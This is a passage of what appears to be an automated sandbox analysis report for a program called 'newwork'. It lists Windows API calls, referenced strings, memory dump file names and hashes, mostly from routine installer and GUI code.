                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                • API String ID: 3478007392-2498399450
                                                                                • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                                                • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                                                APIs
                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                • String ID: AllowSetForegroundWindow$user32.dll
                                                                                • API String ID: 1782028327-3855017861
                                                                                • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                                                • Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
                                                                                APIs
                                                                                • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                                • SaveDC.GDI32(?), ref: 00416C83
                                                                                • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                                • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                                • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                • String ID:
                                                                                • API String ID: 3808407030-0
                                                                                • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                                • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                                • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                                • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                                • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                                • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                                • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                                • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                                • GetDC.USER32(00000000), ref: 0041BC12
                                                                                • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                                • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                • String ID:
                                                                                • API String ID: 1095203571-0
                                                                                • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                                APIs
                                                                                  • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                                                Strings
                                                                                • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                                                • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                                                • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                • API String ID: 1452528299-4018462623
                                                                                • Opcode ID: 84f5240d3e2a5678dc298f5d2d5fcd3d219003d8bdc0b17d0e0e8e1e879b006c
                                                                                • Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
                                                                                • Opcode Fuzzy Hash: 84f5240d3e2a5678dc298f5d2d5fcd3d219003d8bdc0b17d0e0e8e1e879b006c
                                                                                • Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocString
                                                                                • String ID:
                                                                                • API String ID: 262959230-0
                                                                                • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                APIs
                                                                                • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                                                • RealizePalette.GDI32(00000000), ref: 00414421
                                                                                • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                                                • RealizePalette.GDI32(00000000), ref: 0041443B
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Palette$RealizeSelect$Release
                                                                                • String ID:
                                                                                • API String ID: 2261976640-0
                                                                                • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                                                • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                                                APIs
                                                                                  • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                                  • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                                  • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                                  • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                                                • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                                                • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                                                • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                                  • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
                                                                                  • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                                  • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                                  • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                                                • String ID: vLB
                                                                                • API String ID: 1477829881-1797516613
                                                                                • Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                                                • Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                                                APIs
                                                                                • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                                                • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                                                • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Enum$NameOpenResourceUniversal
                                                                                • String ID: Z
                                                                                • API String ID: 3604996873-1505515367
                                                                                • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                                                • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                                                APIs
                                                                                • SetRectEmpty.USER32(?), ref: 0044D04E
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: DrawText$EmptyRect
                                                                                • String ID:
                                                                                • API String ID: 182455014-2867612384
                                                                                • Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                                                • Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0042EF9E
                                                                                  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                                                • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFontIndirectObjectReleaseSelect
                                                                                • String ID: ...\
                                                                                • API String ID: 3133960002-983595016
                                                                                • Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                                                • Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                                                APIs
                                                                                • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                • RegisterClassA.USER32(?), ref: 004164CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Class$InfoRegisterUnregister
                                                                                • String ID: @
                                                                                • API String ID: 3749476976-2766056989
                                                                                • Opcode ID: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                                                • Opcode Fuzzy Hash: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
                                                                                • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: File$Attributes$Move
                                                                                • String ID: isRS-%.3u.tmp
                                                                                • API String ID: 3839737484-3657609586
                                                                                • Opcode ID: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                • Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
                                                                                • Opcode Fuzzy Hash: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                • Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ExitMessageProcess
                                                                                • String ID: Error$Runtime error at 00000000
                                                                                • API String ID: 1220098344-2970929446
                                                                                • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                APIs
                                                                                  • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                                                • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                                                Strings
                                                                                Memory Dump Source
